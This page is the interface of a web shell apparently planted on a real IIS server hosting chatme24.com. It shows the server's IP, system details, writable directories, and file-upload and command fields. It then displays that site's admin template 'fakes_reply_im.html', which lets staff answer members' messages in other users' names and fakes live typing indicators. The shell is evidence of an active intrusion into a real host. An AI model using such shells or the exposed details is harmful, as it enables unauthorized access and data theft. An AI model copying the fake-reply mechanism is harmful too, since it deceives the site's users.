403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/_frameworks/administration/default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/_frameworks/administration/default/fakes_reply_im.html
{header}

<script>
var timeoutSec = 10000;
var status_writing = {};
$(function() {
    $('[id ^= msg_field_]').keydown(function(e) {
        var d = new Date(),
            data = $(this),
            param = data[0]['id'].split('_');
        if (typeof status_writing[param[3]] == 'undefined') {
            status_writing[param[3]] = {};
        }
        status_writing[param[3]]['user_to'] = param[2];
        status_writing[param[3]]['time'] = parseInt(d.getTime()/1000);
    })

    setInterval(function(){
        if ($.isEmptyObject(status_writing) != true) {
             $.ajax({type: 'POST',
                     url: '{url_page}',
                     dataType: 'json',
                     data: {cmd: 'writing', writing: JSON.stringify(status_writing)}
            })
        }
    }, timeoutSec);
})

function showImageIm(){}
</script>


<div class="block_narrow">
	{menu_page}
</div>
<div class="block_main">
    <h2>{l_title_current}</h2>
	<div>

	<div style="color:#F00; font-weight:bold;">{error_message}</div>

<!-- begin_mail_list_items -->

	<!-- begin_mail_list_item -->

        <!-- begin_mail_new -->
        <div style="float:left; margin-top: 3px;"><img src="{url_tmpl_administration}images/new.png" width="22" height="17" border="0"></div>
        <!-- end_mail_new -->
        <!-- begin_mail_old -->
        <div style="float:left; margin-top: 3px;"><img src="{url_tmpl_administration}images/icon_mail_read.png" width="22" height="17" border="0"></div>
        <!-- end_mail_old -->
		<div  style="width: 100%;">
            <h2 style="padding-bottom: 1px;">{l_from} <a target="_blank" href="../search_results.php?display=profile&uid={from_user}">{user_from}</a> {l_to} <a target="_blank" href="../search_results.php?display=profile&uid={to_user}">{user_to}</a></h2>
        </div>
		<p><b>{l_date}:</b> {born} <!-- begin_is_read --><img style="margin-top: -2px; margin-left: 2px;" src="{url_tmpl_administration}images/checkmark.png"><!-- end_is_read --></p>
		<div class="list_im_message">
			<!-- begin_message_audio -->
			<span class="im_audio_message">
				<span id="pp_messages_audio_{message_id}" class="im_audio_message_loader" data-audio-message-file="{message_audio_message_file}" >
					<i class="fa fa-play" aria-hidden="true"></i>
				</span>
				<span class="im_audio_message_process"></span>
				<span class="im_audio_message_process_play"></span>
			</span>
			<!-- end_message_audio -->
            <!-- begin_message_text -->
            <p class="pp_message_node">

                <span>{message}</span>
                <!-- begin_message_block -->
                <span style="color:red;">{l_you_are_in_block_list}</span>
                <!-- end_message_block -->

				<!-- begin_message_original_text -->
				<div class="pp_message_original_title">{l_the_message_was_autotranslated} ({message_original})
				</div>
				<!-- end_message_original_text -->
            </p>
            <!-- end_message_text -->

            <!-- begin_message_gift -->
            <div class="frame_gift"><a style="cursor:default;" onclick="return false;" href="#"><img src="{gift_img_url}" alt="" /></a></div>
            <!-- begin_message_gift_text -->
            <div class="gift_msg_decor">
                <div class="gift_msg_decor_txt"><span>{gift_text}</span></div>
            </div>
            <!-- end_message_gift_text -->
            <!-- end_message_gift -->
		</div>

        <!-- begin_reply -->
        <div style="padding-top:10px;">
        <form method="post">
            <input type="hidden" name="cmd" value="reply">
			<input type="hidden" name="user_to" value="{from_user}">
			<input type="hidden" name="user_from" value="{to_user}">
            <input id="msg_field_{from_user}_{to_user}" style="width: 100%;" type="text" name="text" class="w2010px" value=""><br>

            <div class="wrap_button fl_right">
              <button class="button" type="submit">{l_send}</button>
            </div>

            <div class="cl"></div>
        </form>
        </div>
        <!-- end_reply -->
        <!-- begin_reply_block -->
        <div style="padding:10px 0px 10px 0px; font-weight: bold; font-size: 14px;">
        {l_you_are_in_block_list}
        </div>
        <!-- end_reply_block -->

	<!-- end_mail_list_item -->
<br />
<br />
<!-- end_mail_list_items -->

	    <!-- begin_mail_list_pages -->
			<div class="body_text" style="padding-bottom: 16px;">
				<!-- begin_mail_list_prev_page -->
				<a href="{url_page}?offset={offset}{params}" class="pri_text_bold">{l_prev}</a>&nbsp; | &nbsp;
				<!-- end_mail_list_prev_page -->
				<!-- begin_mail_list_prev_page_off -->
				<b>{l_prev}</b>&nbsp; | &nbsp;
				<!-- end_mail_list_prev_page_off -->
				<!-- begin_mail_list_first_page -->
				<a href="{url_page}?offset={offset}{params}" class="pri_text_bold">{l_page_1}</a>&nbsp;
				<!-- end_mail_list_first_page -->
				<!-- begin_mail_list_prev_pages -->
				<a href="{url_page}?offset={offset}{params}" class="pri_text_bold">&lt;&lt;</a>&nbsp;
				<!-- end_mail_list_prev_pages -->
				<!-- begin_mail_list_page -->
					<!-- begin_mail_list_link_page -->
					<a href="{url_page}?offset={offset}{params}" class="pri_text_bold">{page}</a>&nbsp;
					<!-- end_mail_list_link_page -->
					<!-- begin_mail_list_this_page -->
					<b>{page}</b>
					<!-- end_mail_list_this_page -->
				<!-- end_mail_list_page -->
				<!-- begin_mail_list_next_pages -->
				<a href="{url_page}?offset={offset}{params}" class="pri_text_bold">&gt;&gt;</a>&nbsp;
				<!-- end_mail_list_next_pages -->
				<!-- begin_mail_list_last_page -->
				<b>{l_of}</b> <a href="{url_page}?offset={offset}{params}" class="pri_text_bold">{num_pages}</a>&nbsp;
				<!-- end_mail_list_last_page -->
				<!-- begin_mail_list_next_page -->
				&nbsp; | &nbsp;<a href="{url_page}?offset={offset}{params}" class="pri_text_bold">{l_next}</a>
				<!-- end_mail_list_next_page -->
				<!-- begin_mail_list_next_page_off -->
				&nbsp; | &nbsp;<b>{l_next}</b>
				<!-- end_mail_list_next_page_off -->
			</div>
            <!-- end_mail_list_pages -->
</div></div>

<script>
    $('.lightbox, .lightbox_pics_im').lightBox({
            resizeImage:    true,
            maxWidth:       996,
            imageLoading:   '{url_tmpl_administration}images/lightbox-ico-loading_blank.gif',
            imageBtnPrev:   '{url_tmpl_administration}images/lightbox-btn-prev.gif',
            imageBtnNext:   '{url_tmpl_administration}images/lightbox-btn-next.gif',
            imageBtnClose:  '{url_tmpl_administration}images/lightbox-btn-close.gif',
            imageBlank:     '{url_tmpl_administration}images/lightbox-blank.gif'
    });
</script>

{footer}

Youez - 2016 - github.com/yon3zu
LinuXploit